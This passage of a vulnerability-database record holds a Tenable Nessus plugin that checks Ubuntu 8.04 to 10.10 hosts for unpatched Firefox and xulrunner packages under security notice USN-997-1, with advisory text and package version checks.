"CVE-2010-3179", "CVE-2010-3175", "CVE-2010-3182", "CVE-2010-3183"], "modified": "2018-11-28T00:00:00", "cpe": ["p-cpe:/a:canonical:ubuntu_linux:abrowser", "p-cpe:/a:canonical:ubuntu_linux:xulrunner-1.9.2-dev", "p-cpe:/a:canonical:ubuntu_linux:xulrunner-1.9.2", "p-cpe:/a:canonical:ubuntu_linux:firefox-mozsymbols", "p-cpe:/a:canonical:ubuntu_linux:xulrunner-1.9.2-testsuite", "p-cpe:/a:canonical:ubuntu_linux:firefox-3.0-dev", "p-cpe:/a:canonical:ubuntu_linux:firefox-3.1-dbg", "p-cpe:/a:canonical:ubuntu_linux:firefox-3.1-dev", "p-cpe:/a:canonical:ubuntu_linux:xulrunner-1.9.1-dev", "p-cpe:/a:canonical:ubuntu_linux:firefox-dom-inspector", "p-cpe:/a:canonical:ubuntu_linux:firefox-gnome-support", "p-cpe:/a:canonical:ubuntu_linux:xulrunner-1.9.2-testsuite-dev", "p-cpe:/a:canonical:ubuntu_linux:firefox-2-libthai", "p-cpe:/a:canonical:ubuntu_linux:xulrunner-1.9.1-gnome-support", "p-cpe:/a:canonical:ubuntu_linux:firefox-libthai", "p-cpe:/a:canonical:ubuntu_linux:abrowser-3.1", "p-cpe:/a:canonical:ubuntu_linux:firefox-branding", "p-cpe:/a:canonical:ubuntu_linux:abrowser-3.5-branding", "p-cpe:/a:canonical:ubuntu_linux:firefox-2-dbg", "p-cpe:/a:canonical:ubuntu_linux:xulrunner-1.9.1-dbg", "p-cpe:/a:canonical:ubuntu_linux:xulrunner-dev", "p-cpe:/a:canonical:ubuntu_linux:xulrunner-1.9.1", "p-cpe:/a:canonical:ubuntu_linux:firefox-dev", "p-cpe:/a:canonical:ubuntu_linux:firefox", "p-cpe:/a:canonical:ubuntu_linux:firefox-3.0-dom-inspector", "p-cpe:/a:canonical:ubuntu_linux:firefox-3.0-gnome-support", "p-cpe:/a:canonical:ubuntu_linux:abrowser-3.5", "p-cpe:/a:canonical:ubuntu_linux:xulrunner-1.9.2-gnome-support", "p-cpe:/a:canonical:ubuntu_linux:firefox-3.0-venkman", "p-cpe:/a:canonical:ubuntu_linux:firefox-3.5", "p-cpe:/a:canonical:ubuntu_linux:firefox-2-gnome-support", "p-cpe:/a:canonical:ubuntu_linux:xulrunner-1.9.1-testsuite", "p-cpe:/a:canonical:ubuntu_linux:firefox-3.5-gnome-support", "cpe:/o:canonical:ubuntu_linux:10.04:-:lts", "p-cpe:/a:canonical:ubuntu_linux:firefox-3.5-dbg", "p-cpe:/a:canonical:ubuntu_linux:firefox-trunk-gnome-support", "p-cpe:/a:canonical:ubuntu_linux:firefox-gnome-support-dbg", "cpe:/o:canonical:ubuntu_linux:8.04:-:lts", "p-cpe:/a:canonical:ubuntu_linux:firefox-3.5-branding", "p-cpe:/a:canonical:ubuntu_linux:xulrunner-1.9.2-dbg", "p-cpe:/a:canonical:ubuntu_linux:firefox-3.1", "cpe:/o:canonical:ubuntu_linux:10.10", "p-cpe:/a:canonical:ubuntu_linux:firefox-2-dom-inspector", "p-cpe:/a:canonical:ubuntu_linux:xulrunner-1.9.1-testsuite-dev", "cpe:/o:canonical:ubuntu_linux:9.10", "p-cpe:/a:canonical:ubuntu_linux:abrowser-branding", "p-cpe:/a:canonical:ubuntu_linux:firefox-3.1-branding", "p-cpe:/a:canonical:ubuntu_linux:firefox-trunk", "p-cpe:/a:canonical:ubuntu_linux:firefox-granparadiso", "p-cpe:/a:canonical:ubuntu_linux:firefox-2-dev", "p-cpe:/a:canonical:ubuntu_linux:abrowser-3.0-branding", "p-cpe:/a:canonical:ubuntu_linux:firefox-3.5-dev", "p-cpe:/a:canonical:ubuntu_linux:firefox-granparadiso-gnome-support", "p-cpe:/a:canonical:ubuntu_linux:firefox-3.1-gnome-support", "p-cpe:/a:canonical:ubuntu_linux:firefox-trunk-dev", "cpe:/o:canonical:ubuntu_linux:9.04", "p-cpe:/a:canonical:ubuntu_linux:firefox-3.0", "p-cpe:/a:canonical:ubuntu_linux:firefox-dbg", "p-cpe:/a:canonical:ubuntu_linux:firefox-granparadiso-dev", "p-cpe:/a:canonical:ubuntu_linux:firefox-3.0-branding", "p-cpe:/a:canonical:ubuntu_linux:firefox-2", "p-cpe:/a:canonical:ubuntu_linux:abrowser-3.1-branding", "p-cpe:/a:canonical:ubuntu_linux:abrowser-3.0", "p-cpe:/a:canonical:ubuntu_linux:xulrunner-1.9"], "id": "UBUNTU_USN-997-1.NASL", "href": "https://www.tenable.com/plugins/index.php?view=single&id=50082", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were\n# extracted from Ubuntu Security Notice USN-997-1. The text \n# itself is copyright (C) Canonical, Inc. See \n# <http://www.ubuntu.com/usn/>. Ubuntu(R) is a registered \n# trademark of Canonical, Inc.\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(50082);\n script_version(\"1.16\");\n script_cvs_date(\"Date: 2018/11/28 22:47:45\");\n\n script_cve_id(\"CVE-2010-3175\", \"CVE-2010-3176\", \"CVE-2010-3177\", \"CVE-2010-3178\", \"CVE-2010-3179\", \"CVE-2010-3180\", \"CVE-2010-3182\", \"CVE-2010-3183\");\n script_bugtraq_id(44243, 44245, 44247, 44248, 44249, 44251, 44252, 44253);\n script_xref(name:\"USN\", value:\"997-1\");\n\n script_name(english:\"Ubuntu 8.04 LTS / 9.04 / 9.10 / 10.04 LTS / 10.10 : firefox, firefox-3.0, firefox-3.5, xulrunner-1.9.1, xulrunner-1.9.2 vulnerabilities (USN-997-1)\");\n script_summary(english:\"Checks dpkg output for updated packages.\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\n\"The remote Ubuntu host is missing one or more security-related\npatches.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"Paul Nickerson, Jesse Ruderman, Olli Pettay, Igor Bukanov, Josh Soref,\nGary Kwong, Martijn Wargers, Siddharth Agarwal and Michal Zalewski\ndiscovered various flaws in the browser engine. An attacker could\nexploit this to crash the browser or possibly run arbitrary code as\nthe user invoking the program. (CVE-2010-3175, CVE-2010-3176)\n\nAlexander Miller, Sergey Glazunov, and others discovered several flaws\nin the JavaScript engine. An attacker could exploit this to crash the\nbrowser or possibly run arbitrary code as the user invoking the\nprogram. (CVE-2010-3179, CVE-2010-3180, CVE-2010-3183)\n\nRobert Swiecki discovered that Firefox did not properly validate\nGopher URLs. If a user were tricked into opening a crafted file via\nGopher, an attacker could possibly run arbitrary JavaScript.\n(CVE-2010-3177)\n\nEduardo Vela Nava discovered that Firefox could be made to violate the\nsame-origin policy by using modal calls with JavaScript. An attacker\ncould exploit this to steal information from another site.\n(CVE-2010-3178)\n\nDmitri GribenkoDmitri Gribenko discovered that Firefox did not\nproperly setup the LD_LIBRARY_PATH environment variable. A local\nattacker could exploit this to execute arbitrary code as the user\ninvoking the program. (CVE-2010-3182).\n\nNote that Tenable Network Security has extracted the preceding\ndescription block directly from the Ubuntu security advisory. Tenable\nhas attempted to automatically clean and format it as much as possible\nwithout introducing additional issues.\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://usn.ubuntu.com/997-1/\"\n );\n script_set_attribute(attribute:\"solution\", value:\"Update the affected packages.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:M/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:POC/RL:OF/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:canonical:ubuntu_linux:abrowser\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:canonical:ubuntu_linux:abrowser-3.0\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:canonical:ubuntu_linux:abrowser-3.0-branding\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:canonical:ubuntu_linux:abrowser-3.1\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:canonical:ubuntu_linux:abrowser-3.1-branding\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:canonical:ubuntu_linux:abrowser-3.5\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:canonical:ubuntu_linux:abrowser-3.5-branding\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:canonical:ubuntu_linux:abrowser-branding\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:canonical:ubuntu_linux:firefox\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:canonical:ubuntu_linux:firefox-2\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:canonical:ubuntu_linux:firefox-2-dbg\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:canonical:ubuntu_linux:firefox-2-dev\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:canonical:ubuntu_linux:firefox-2-dom-inspector\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:canonical:ubuntu_linux:firefox-2-gnome-support\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:canonical:ubuntu_linux:firefox-2-libthai\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:canonical:ubuntu_linux:firefox-3.0\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:canonical:ubuntu_linux:firefox-3.0-branding\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:canonical:ubuntu_linux:firefox-3.0-dev\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:canonical:ubuntu_linux:firefox-3.0-dom-inspector\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:canonical:ubuntu_linux:firefox-3.0-gnome-support\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:canonical:ubuntu_linux:firefox-3.0-venkman\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:canonical:ubuntu_linux:firefox-3.1\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:canonical:ubuntu_linux:firefox-3.1-branding\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:canonical:ubuntu_linux:firefox-3.1-dbg\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:canonical:ubuntu_linux:firefox-3.1-dev\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:canonical:ubuntu_linux:firefox-3.1-gnome-support\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:canonical:ubuntu_linux:firefox-3.5\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:canonical:ubuntu_linux:firefox-3.5-branding\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:canonical:ubuntu_linux:firefox-3.5-dbg\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:canonical:ubuntu_linux:firefox-3.5-dev\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:canonical:ubuntu_linux:firefox-3.5-gnome-support\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:canonical:ubuntu_linux:firefox-branding\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:canonical:ubuntu_linux:firefox-dbg\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:canonical:ubuntu_linux:firefox-dev\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:canonical:ubuntu_linux:firefox-dom-inspector\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:canonical:ubuntu_linux:firefox-gnome-support\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:canonical:ubuntu_linux:firefox-gnome-support-dbg\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:canonical:ubuntu_linux:firefox-granparadiso\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:canonical:ubuntu_linux:firefox-granparadiso-dev\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:canonical:ubuntu_linux:firefox-granparadiso-gnome-support\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:canonical:ubuntu_linux:firefox-libthai\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:canonical:ubuntu_linux:firefox-mozsymbols\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:canonical:ubuntu_linux:firefox-trunk\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:canonical:ubuntu_linux:firefox-trunk-dev\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:canonical:ubuntu_linux:firefox-trunk-gnome-support\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:canonical:ubuntu_linux:xulrunner-1.9\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:canonical:ubuntu_linux:xulrunner-1.9.1\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:canonical:ubuntu_linux:xulrunner-1.9.1-dbg\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:canonical:ubuntu_linux:xulrunner-1.9.1-dev\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:canonical:ubuntu_linux:xulrunner-1.9.1-gnome-support\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:canonical:ubuntu_linux:xulrunner-1.9.1-testsuite\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:canonical:ubuntu_linux:xulrunner-1.9.1-testsuite-dev\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:canonical:ubuntu_linux:xulrunner-1.9.2\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:canonical:ubuntu_linux:xulrunner-1.9.2-dbg\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:canonical:ubuntu_linux:xulrunner-1.9.2-dev\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:canonical:ubuntu_linux:xulrunner-1.9.2-gnome-support\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:canonical:ubuntu_linux:xulrunner-1.9.2-testsuite\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:canonical:ubuntu_linux:xulrunner-1.9.2-testsuite-dev\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:canonical:ubuntu_linux:xulrunner-dev\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:canonical:ubuntu_linux:10.04:-:lts\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:canonical:ubuntu_linux:10.10\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:canonical:ubuntu_linux:8.04:-:lts\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:canonical:ubuntu_linux:9.04\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:canonical:ubuntu_linux:9.10\");\n\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2010/10/20\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2010/10/21\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"Ubuntu Security Notice (C) 2010-2018 Canonical, Inc. / NASL script (C) 2010-2018 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n script_family(english:\"Ubuntu Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/cpu\", \"Host/Ubuntu\", \"Host/Ubuntu/release\", \"Host/Debian/dpkg-l\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"ubuntu.inc\");\ninclude(\"misc_func.inc\");\n\nif ( ! get_kb_item(\"Host/local_checks_enabled\") ) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nrelease = get_kb_item(\"Host/Ubuntu/release\");\nif ( isnull(release) ) audit(AUDIT_OS_NOT, \"Ubuntu\");\nrelease = chomp(release);\nif (! ereg(pattern:\"^(8\\.04|9\\.04|9\\.10|10\\.04|10\\.10)$\", string:release)) audit(AUDIT_OS_NOT, \"Ubuntu 8.04 / 9.04 / 9.10 / 10.04 / 10.10\", \"Ubuntu \" + release);\nif ( ! get_kb_item(\"Host/Debian/dpkg-l\") ) audit(AUDIT_PACKAGE_LIST_MISSING);\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (\"x86_64\" >!< cpu && cpu !~ \"^i[3-6]86$\") audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"Ubuntu\", cpu);\n\nflag = 0;\n\nif (ubuntu_check(osver:\"8.04\", pkgname:\"abrowser\", pkgver:\"3.6.11+build3+nobinonly-0ubuntu0.8.04.1\")) flag++;\nif (ubuntu_check(osver:\"8.04\", pkgname:\"abrowser-branding\", pkgver:\"3.6.11+build3+nobinonly-0ubuntu0.8.04.1\")) flag++;\nif (ubuntu_check(osver:\"8.04\", pkgname:\"firefox\", pkgver:\"3.6.11+build3+nobinonly-0ubuntu0.8.04.1\")) flag++;\nif (ubuntu_check(osver:\"8.04\", pkgname:\"firefox-3.0\", pkgver:\"3.6.11+build3+nobinonly-0ubuntu0.8.04.1\")) flag++;\nif (ubuntu_check(osver:\"8.04\", pkgname:\"firefox-3.0-dev\", pkgver:\"3.6.11+build3+nobinonly-0ubuntu0.8.04.1\")) flag++;\nif (ubuntu_check(osver:\"8.04\", pkgname:\"firefox-3.0-gnome-support\", pkgver:\"3.6.11+build3+nobinonly-0ubuntu0.8.04.1\")) flag++;\nif (ubuntu_check(osver:\"8.04\", pkgname:\"firefox-branding\", pkgver:\"3.6.11+build3+nobinonly-0ubuntu0.8.04.1\")) flag++;\nif (ubuntu_check(osver:\"8.04\", pkgname:\"firefox-dbg\", pkgver:\"3.6.11+build3+nobinonly-0ubuntu0.8.04.1\")) flag++;\nif (ubuntu_check(osver:\"8.04\", pkgname:\"firefox-dev\", pkgver:\"3.6.11+build3+nobinonly-0ubuntu0.8.04.1\")) flag++;\nif (ubuntu_check(osver:\"8.04\", pkgname:\"firefox-gnome-support\", pkgver:\"3.6.11+build3+nobinonly-0ubuntu0.8.04.1\")) flag++;\nif (ubuntu_check(osver:\"8.04\", pkgname:\"firefox-gnome-support-dbg\", pkgver:\"3.6.11+build3+nobinonly-0ubuntu0.8.04.1\")) flag++;\nif (ubuntu_check(osver:\"8.04\", pkgname:\"firefox-granparadiso\", pkgver:\"3.6.11+build3+nobinonly-0ubuntu0.8.04.1\")) flag++;\nif (ubuntu_check(osver:\"8.04\", pkgname:\"firefox-granparadiso-dev\", pkgver:\"3.6.11+build3+nobinonly-0ubuntu0.8.04.1\")) flag++;\nif (ubuntu_check(osver:\"8.04\", pkgname:\"firefox-granparadiso-gnome-support\", pkgver:\"3.6.11+build3+nobinonly-0ubuntu0.8.04.1\")) flag++;\nif (ubuntu_check(osver:\"8.04\", pkgname:\"firefox-libthai\", pkgver:\"3.6.11+build3+nobinonly-0ubuntu0.8.04.1\")) flag++;\nif (ubuntu_check(osver:\"8.04\", pkgname:\"firefox-trunk\", pkgver:\"3.6.11+build3+nobinonly-0ubuntu0.8.04.1\")) flag++;\nif (ubuntu_check(osver:\"8.04\", pkgname:\"firefox-trunk-dev\", pkgver:\"3.6.11+build3+nobinonly-0ubuntu0.8.04.1\")) flag++;\nif (ubuntu_check(osver:\"8.04\", pkgname:\"firefox-trunk-gnome-support\", pkgver:\"3.6.11+build3+nobinonly-0ubuntu0.8.04.1\")) flag++;\nif (ubuntu_check(osver:\"8.04\", pkgname:\"xulrunner-1.9.2\", pkgver:\"1.9.2.11+build3+nobinonly-0ubuntu0.8.04.1\")) flag++;\nif (ubuntu_check(osver:\"8.04\", pkgname:\"xulrunner-1.9.2-dbg\", pkgver:\"1.9.2.11+build3+nobinonly-0ubuntu0.8.04.1\")) flag++;\nif (ubuntu_check(osver:\"8.04\", pkgname:\"xulrunner-1.9.2-dev\", pkgver:\"1.9.2.11+build3+nobinonly-0ubuntu0.8.04.1\")) flag++;\nif (ubuntu_check(osver:\"8.04\", pkgname:\"xulrunner-1.9.2-gnome-support\", pkgver:\"1.9.2.11+build3+nobinonly-0ubuntu0.8.04.1\")) flag++;\nif (ubuntu_check(osver:\"8.04\", pkgname:\"xulrunner-1.9.2-testsuite\", pkgver:\"1.9.2.11+build3+nobinonly-0ubuntu0.8.04.1\")) flag++;\nif (ubuntu_check(osver:\"8.04\", pkgname:\"xulrunner-1.9.2-testsuite-dev\", pkgver:\"1.9.2.11+build3+nobinonly-0ubuntu0.8.04.1\")) flag++;\nif (ubuntu_check(osver:\"8.04\", pkgname:\"xulrunner-dev\", pkgver:\"1.9.2.11+build3+nobinonly-0ubuntu0.8.04.1\")) flag++;\nif (ubuntu_check(osver:\"9.04\", pkgname:\"abrowser\", pkgver:\"3.6.11+build3+nobinonly-0ubuntu0.9.04.1\")) flag++;\nif (ubuntu_check(osver:\"9.04\", pkgname:\"abrowser-3.0-branding\", pkgver:\"3.6.11+build3+nobinonly-0ubuntu0.9.04.1\")) flag++;\nif (ubuntu_check(osver:\"9.04\", pkgname:\"abrowser-branding\", pkgver:\"3.6.11+build3+nobinonly-0ubuntu0.9.04.1\")) flag++;\nif (ubuntu_check(osver:\"9.04\", pkgname:\"firefox\", pkgver:\"3.6.11+build3+nobinonly-0ubuntu0.9.04.1\")) flag++;\nif (ubuntu_check(osver:\"9.04\", pkgname:\"firefox-2\", pkgver:\"3.6.11+build3+nobinonly-0ubuntu0.9.04.1\")) flag++;\nif (ubuntu_check(osver:\"9.04\", pkgname:\"firefox-2-dbg\", pkgver:\"3.6.11+build3+nobinonly-0ubuntu0.9.04.1\")) flag++;\nif (ubuntu_check(osver:\"9.04\", pkgname:\"firefox-2-dev\", pkgver:\"3.6.11+build3+nobinonly-0ubuntu0.9.04.1\")) flag++;\nif (ubuntu_check(osver:\"9.04\", pkgname:\"firefox-2-dom-inspector\", pkgver:\"3.6.11+build3+nobinonly-0ubuntu0.9.04.1\")) flag++;\nif (ubuntu_check(osver:\"9.04\", pkgname:\"firefox-2-gnome-support\", pkgver:\"3.6.11+build3+nobinonly-0ubuntu0.9.04.1\")) flag++;\nif (ubuntu_check(osver:\"9.04\", pkgname:\"firefox-2-libthai\", pkgver:\"3.6.11+build3+nobinonly-0ubuntu0.9.04.1\")) flag++;\nif (ubuntu_check(osver:\"9.04\", pkgname:\"firefox-3.0\", pkgver:\"3.6.11+build3+nobinonly-0ubuntu0.9.04.1\")) flag++;\nif (ubuntu_check(osver:\"9.04\", pkgname:\"firefox-3.0-branding\", pkgver:\"3.6.11+build3+nobinonly-0ubuntu0.9.04.1\")) flag++;\nif (ubuntu_check(osver:\"9.04\", pkgname:\"firefox-3.0-dev\", pkgver:\"3.6.11+build3+nobinonly-0ubuntu0.9.04.1\")) flag++;\nif (ubuntu_check(osver:\"9.04\", pkgname:\"firefox-3.0-gnome-support\", pkgver:\"3.6.11+build3+nobinonly-0ubuntu0.9.04.1\")) flag++;\nif (ubuntu_check(osver:\"9.04\", pkgname:\"firefox-branding\", pkgver:\"3.6.11+build3+nobinonly-0ubuntu0.9.04.1\")) flag++;\nif (ubuntu_check(osver:\"9.04\", pkgname:\"firefox-dbg\", pkgver:\"3.6.11+build3+nobinonly-0ubuntu0.9.04.1\")) flag++;\nif (ubuntu_check(osver:\"9.04\", pkgname:\"firefox-dev\", pkgver:\"3.6.11+build3+nobinonly-0ubuntu0.9.04.1\")) flag++;\nif (ubuntu_check(osver:\"9.04\", pkgname:\"firefox-gnome-support\", pkgver:\"3.6.11+build3+nobinonly-0ubuntu0.9.04.1\")) flag++;\nif (ubuntu_check(osver:\"9.04\", pkgname:\"firefox-gnome-support-dbg\", pkgver:\"3.6.11+build3+nobinonly-0ubuntu0.9.04.1\")) flag++;\nif (ubuntu_check(osver:\"9.04\", pkgname:\"firefox-granparadiso\", pkgver:\"3.6.11+build3+nobinonly-0ubuntu0.9.04.1\")) flag++;\nif (ubuntu_check(osver:\"9.04\", pkgname:\"firefox-granparadiso-dev\", pkgver:\"3.6.11+build3+nobinonly-0ubuntu0.9.04.1\")) flag++;\nif (ubuntu_check(osver:\"9.04\", pkgname:\"firefox-granparadiso-gnome-support\", pkgver:\"3.6.11+build3+nobinonly-0ubuntu0.9.04.1\")) flag++;\nif (ubuntu_check(osver:\"9.04\", pkgname:\"firefox-libthai\", pkgver:\"3.6.11+build3+nobinonly-0ubuntu0.9.04.1\")) flag++;\nif (ubuntu_check(osver:\"9.04\", pkgname:\"firefox-trunk\", pkgver:\"3.6.11+build3+nobinonly-0ubuntu0.9.04.1\")) flag++;\nif (ubuntu_check(osver:\"9.04\", pkgname:\"firefox-trunk-dev\", pkgver:\"3.6.11+build3+nobinonly-0ubuntu0.9.04.1\")) flag++;\nif (ubuntu_check(osver:\"9.04\", pkgname:\"firefox-trunk-gnome-support\", pkgver:\"3.6.11+build3+nobinonly-0ubuntu0.9.04.1\")) flag++;\nif (ubuntu_check(osver:\"9.04\", pkgname:\"xulrunner-1.9.2\", pkgver:\"1.9.2.11+build3+nobinonly-0ubuntu0.9.04.1\")) flag++;\nif (ubuntu_check(osver:\"9.04\", pkgname:\"xulrunner-1.9.2-dbg\", pkgver:\"1.9.2.11+build3+nobinonly-0ubuntu0.9.04.1\")) flag++;\nif (ubuntu_check(osver:\"9.04\", pkgname:\"xulrunner-1.9.2-dev\", pkgver:\"1.9.2.11+build3+nobinonly-0ubuntu0.9.04.1\")) flag++;\nif (ubuntu_check(osver:\"9.04\", pkgname:\"xulrunner-1.9.2-gnome-support\", pkgver:\"1.9.2.11+build3+nobinonly-0ubuntu0.9.04.1\")) flag++;\nif (ubuntu_check(osver:\"9.04\", pkgname:\"xulrunner-1.9.2-testsuite\", pkgver:\"1.9.2.11+build3+nobinonly-0ubuntu0.9.04.1\")) flag++;\nif (ubuntu_check(osver:\"9.04\", pkgname:\"xulrunner-1.9.2-testsuite-dev\", pkgver:\"1.9.2.11+build3+nobinonly-0ubuntu0.9.04.1\")) flag++;\nif (ubuntu_check(osver:\"9.04\", pkgname:\"xulrunner-dev\", pkgver:\"1.9.2.11+build3+nobinonly-0ubuntu0.9.04.1\")) flag++;\nif (ubuntu_check(osver:\"9.10\", pkgname:\"abrowser\", pkgver:\"3.6.11+build3+nobinonly-0ubuntu0.9.10.1\")) flag++;\nif (ubuntu_check(osver:\"9.10\", pkgname:\"abrowser-3.0\", pkgver:\"3.6.11+build3+nobinonly-0ubuntu0.9.10.1\")) flag++;\nif (ubuntu_check(osver:\"9.10\", pkgname:\"abrowser-3.0-branding\", pkgver:\"3.6.11+build3+nobinonly-0ubuntu0.9.10.1\")) flag++;\nif (ubuntu_check(osver:\"9.10\", pkgname:\"abrowser-3.1\", pkgver:\"3.6.11+build3+nobinonly-0ubuntu0.9.10.1\")) flag++;\nif (ubuntu_check(osver:\"9.10\", pkgname:\"abrowser-3.1-branding\", pkgver:\"3.6.11+build3+nobinonly-0ubuntu0.9.10.1\")) flag++;\nif (ubuntu_check(osver:\"9.10\", pkgname:\"abrowser-3.5\", pkgver:\"3.6.11+build3+nobinonly-0ubuntu0.9.10.1\")) flag++;\nif (ubuntu_check(osver:\"9.10\", pkgname:\"abrowser-3.5-branding\", pkgver:\"3.6.11+build3+nobinonly-0ubuntu0.9.10.1\")) flag++;\nif (ubuntu_check(osver:\"9.10\", pkgname:\"abrowser-branding\", pkgver:\"3.6.11+build3+nobinonly-0ubuntu0.9.10.1\")) flag++;\nif (ubuntu_check(osver:\"9.10\", pkgname:\"firefox\", pkgver:\"3.6.11+build3+nobinonly-0ubuntu0.9.10.1\")) flag++;\nif (ubuntu_check(osver:\"9.10\", pkgname:\"firefox-2\", pkgver:\"3.6.11+build3+nobinonly-0ubuntu0.9.10.1\")) flag++;\nif (ubuntu_check(osver:\"9.10\", pkgname:\"firefox-2-dbg\", pkgver:\"3.6.11+build3+nobinonly-0ubuntu0.9.10.1\")) flag++;\nif (ubuntu_check(osver:\"9.10\", pkgname:\"firefox-2-dev\", pkgver:\"3.6.11+build3+nobinonly-0ubuntu0.9.10.1\")) flag++;\nif (ubuntu_check(osver:\"9.10\", pkgname:\"firefox-2-dom-inspector\", pkgver:\"3.6.11+build3+nobinonly-0ubuntu0.9.10.1\")) flag++;\nif (ubuntu_check(osver:\"9.10\", pkgname:\"firefox-2-gnome-support\", pkgver:\"3.6.11+build3+nobinonly-0ubuntu0.9.10.1\")) flag++;\nif (ubuntu_check(osver:\"9.10\", pkgname:\"firefox-2-libthai\", pkgver:\"3.6.11+build3+nobinonly-0ubuntu0.9.10.1\")) flag++;\nif (ubuntu_check(osver:\"9.10\", pkgname:\"firefox-3.0\", pkgver:\"3.6.11+build3+nobinonly-0ubuntu0.9.10.1\")) flag++;\nif (ubuntu_check(osver:\"9.10\", pkgname:\"firefox-3.0-branding\", pkgver:\"3.6.11+build3+nobinonly-0ubuntu0.9.10.1\")) flag++;\nif (ubuntu_check(osver:\"9.10\", pkgname:\"firefox-3.0-dev\", pkgver:\"3.6.11+build3+nobinonly-0ubuntu0.9.10.1\")) flag++;\nif (ubuntu_check(osver:\"9.10\", pkgname:\"firefox-3.0-dom-inspector\", pkgver:\"3.6.11+build3+nobinonly-0ubuntu0.9.10.1\")) flag++;\nif (ubuntu_check(osver:\"9.10\", pkgname:\"firefox-3.0-gnome-support\", pkgver:\"3.6.11+build3+nobinonly-0ubuntu0.9.10.1\")) flag++;\nif 